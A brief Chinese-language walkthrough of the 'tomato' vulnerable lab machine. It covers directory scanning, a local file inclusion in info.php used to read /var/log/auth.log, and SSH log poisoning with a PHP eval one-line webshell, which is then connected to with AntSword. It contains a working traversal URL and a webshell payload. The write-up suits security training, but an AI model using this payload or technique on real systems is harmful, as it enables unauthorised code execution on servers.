tomato靶场通关攻略
1.打开tomato靶机和kali虚拟机
2.运用kali扫描靶机ip
3.浏览器访问靶机ip
4.kali dirb扫描敏感文件
5.依次查看这几个文件,发现antibot_image下有文件info.php,发现一个被注释的get型文件包含漏洞,参数为image
6.查看日志文件
http://192.168.126.151/antibot_image/antibots/info.php?image=../../../../../../var/log/auth.log
7.将一句话木马作为ssh登录的用户名,然后登陆,密码随便输入,这样日志文件就会记录该用户登录失败的日志,而该用户的用户名就是我们的一句话木马。
http://192.168.126.151:2211/<?php @eval($_POST['cmd']);?>
运用蚁剑连接木马,连接成功即可